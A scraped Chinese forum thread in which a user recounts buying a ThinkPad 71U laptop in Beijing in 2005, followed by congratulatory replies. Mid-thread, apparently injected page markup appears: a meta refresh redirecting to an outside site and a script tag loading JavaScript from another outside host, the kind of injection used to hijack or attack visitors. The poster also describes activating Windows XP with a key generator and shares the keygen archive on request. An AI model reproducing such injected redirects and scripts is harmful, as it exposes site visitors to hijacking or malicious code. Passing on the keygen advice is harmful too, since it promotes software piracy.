开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] 71U购机手记

2005年10月30日,天气不错,早晨乘坐石家庄到北京的城际特快于10点20分到达北京西客站。我和MM站在西客站的外面先是讨论了一下现实情况,我决定先去吃饭,然后再去翔意购买我中意已久的71U。因为如果先购买机器再去吃饭,背着个大家伙肯定重,而且不方便的说。
MM没有什么意见,向来什么都听我的。从西客站打车到赛物购物中心。出租车师傅在车上问我,去赛特购物吗?我摇头,谁都知道赛特是富人的天堂,我等没有奔驰宝马等名车的穷人肯定是无法在赛特潇洒的。我自嘲地说我去赛特的对面,因为赛特太有名了,所以说是去赛特。
在赛特附近转了几圈,看到了离翔意很近的国际大厦。我们又顺着建国门大街走了一段路,散散步,聊聊天,到了中午随便找了一家饭店吃了些东西。期间北京的朋友打来电话要请我吃饭,被我婉言回绝了,嘿嘿,主要是想和MM单独呆一会儿。
吃完饭找到国际大厦,很容易就找到了安琪物业。上了五楼就找到了翔意。敲开门一看,有好几个小伙子和一个MM在内,MM是翔意的,听口音好象是河北张家口一带的人。几个人正在挑机器,我就耐心等了一会儿。挑好机器的几个朋友去外面取钱时,翔意MM帮我拿了一台71U回来。开箱验机,没有坏点,一切顺利,就装中文系统,然后分区。一切测试正常,正准备付款时先前出去取款的几个朋友回来了,交款取机走人。
听翔意MM说这几个朋友来了老半天,也选了老半天,嘿嘿,还是我利索,包里直接就装着现金。一沓未拆封的一万元交给翔意MM过机,结果显示是99张。过了两遍都是99张。翔意MM人工数了两遍,结果是100张。我MM的工作就是接触现金的,拿过来也数了两遍,100张没错。最后翔意MM说不用过机了,要相信人不能相信机器。呵呵,当然,机器是人造的,肯定是人说了算。
历时大概两个小时抱回了71U。回去的时候坐了高客,去火车站买票太麻烦,我要求坐高客。尽管MM不太愿意坐汽车,她怕头疼,可是为了我还是同意了。
回家后装软件改用户名,结果犯了一个致命的错误,导致无法登录了。没办法只好重装系统,谁知翔意送了两张恢复盘中其中DVD一张不能使用,装了一半读不了出盘来。最后没有办法,只好自己装XP。装好后算了一个号码,上网激活了。然后又装上从微软骗来的SP2正盘光盘。然后就又一个一个的装驱动,好歹也用过四年IBM笔记本电脑了,很快搞定了驱动。
目前71U正在很欢快的运行中,我基本上天天不关机,一切运行正常,很平稳,声音比起以前我用的T22要小了许多。感觉不错。只不过恢复盘坏了有些不爽,告诉了翔意,说是已经重新给寄了一套,可能是平邮,现在还没有收到,正在等待中。
序列号:L3TWAND
申请贵宾。

谢谢您的惠顾,+20----EddieFan
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

评分

EddieFan + 20

贵宾已加,辛苦了

祝贺祝贺

我也很喜欢71U,攒钱吧
谢谢。
第一,买小黑

第二,有MM陪着买小黑

够楼主美一阵儿的了~
liux 该用户已被删除
关于算号器,楼主能不能给个???
原帖由 baiyujin 于 2005-11-7 10:52 发表
关于算号器,楼主能不能给个???

呵呵,算号器以前网上大把的有的,算好后也很好激活的。

XPKey.rar

16.11 KB, 下载次数: 472

原帖由 wong℃ 于 2005-11-7 09:57 发表
第一,买小黑

第二,有MM陪着买小黑

够楼主美一阵儿的了~

嘿嘿,是呀是呀。
高分屏用着一定很爽
字小,正在适应中。不过适应了感觉还是高分屏好,细腻,清晰度高。
好文章
多谢楼上的兄弟。
71U性价最合理,楼主有眼光.
XPKey下载了,谢谢!
一切顺利
替楼主高兴
多谢各位兄弟捧场。
羡慕啊.美女美机都有了啊.
恭喜!好好感受
回去的时候我背着大包小包,MM帮我拎着空箱了,然后又在我的怀中睡了一路。作男人还是命苦的,嘿嘿。

这部叫吃苦,这叫甜蜜的幸福,哈哈

恭喜楼主喜得爱机

71U应该是高分
本来我也想买高分
但是随着年龄的增长
怕老了看不清字体
哈哈
高分下用1024*768
就不清晰了
高分屏是有些字小,正在慢慢适应。呵呵。
恭喜恭喜!攒钱啊!

偶也要买拉!